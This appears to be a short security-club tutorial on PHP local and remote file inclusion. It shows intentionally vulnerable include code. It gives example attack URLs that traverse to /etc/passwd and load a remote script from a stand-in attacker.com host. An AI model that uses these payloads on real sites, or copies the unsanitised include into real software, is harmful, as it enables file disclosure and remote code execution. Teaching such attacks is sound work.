File Inclusion

File inclusion is a class of vulnerability that happens when user input to the path of an included file is not sanitized or handled correctly.

for example, this piece of code is vulnerable:

​

<?php

if ( isset( $_GET[‘file’] ) ) {

include( $_GET[‘file’] );

}

?>

​

Since the user input from the GET request ($_GET[‘language’]) is not sanitized before put into include, the user can include any other files from the file system / network.

​

​

​

​

LFI/RFI

<?php

if ( isset( $_GET[‘file’] ) ) {

include( $_GET[‘file’] );

}

?>

Normal usage:

http://example.com/?file=image.jpg

​

There are two classes of file inclusion attacks.

LFI (Local file inclusion):

When the attacker can leak information through including local files on the web server.

Example exploit:

http://example.com/?file=../../../../../../etc/passwd

​

RFI (Remote File Inclusion):

When the attacker can execute code remotely through including a remote file from another server.

http://example.com/?file=http://attacker.com/evil.php

​

RFI special cases

<?php

if ( isset( $_GET[‘lang’] ) ) {

include( $_GET[‘lang’] . ‘.php’ );

}

?>

Example request:

http://example.com/?lang=en

​

Sometimes the application is written so that the extension is not included from the input. In that case we have to make some educated guesses about what the extension is and what is appended after it.

http://example.com/?lang=http://attacker.com/evil

​

The request to the attacker’s server would look like:

GET /evil.php HTTP/1.1

​

To exploit RFI effectively, you might need an internet reachable web server under your control. (You can also exploit the previous levels to achieve a controlled web server.. be creative!)

​

Shout out to UQ Cybersecurity group & ITIG!

Thanks to John Williams at Cyber group and dlg we will get a new (and bigger) cloud box for challenges soon :)